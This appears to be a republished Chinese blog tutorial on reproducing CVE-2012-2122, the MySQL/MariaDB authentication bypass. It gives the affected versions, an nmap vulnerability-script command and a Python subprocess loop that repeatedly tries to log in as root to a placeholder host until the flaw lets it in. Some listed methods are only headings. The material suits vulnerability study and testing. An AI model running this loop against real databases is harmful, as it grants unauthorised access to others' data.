复现goby——CVE-2012-2122(Mysql 身份认证绕过)

2022/1/23 2:04:24

本文主要是介绍复现goby——CVE-2012-2122(Mysql 身份认证绕过),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

一、漏洞介绍

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。只要知道用户名,不断尝试就能够直接登入SQL数据库。)


二、影响版本

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.


三、goby扫描结果


四、漏洞复现

(一)利用goby自带的漏洞exp进行验证通过即代表有的。

(二)利用msf——metasploit渗透框架

(三) 利用Linux中for循环遍历

 (四)利用nmap自带的脚本模块进行复现

nmap -sV -T4 -p3306  --script=mysql-vuln-cve2012-2122 x.x.x.x

(五)利用pyhon中的subprocess模块和while循环遍历

import subprocess

while 8:
    subprocess.Popen("mysql -h x.x.x.x -u root mysql --password=blan",shell=True).wait()



这篇关于复现goby——CVE-2012-2122(Mysql 身份认证绕过)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程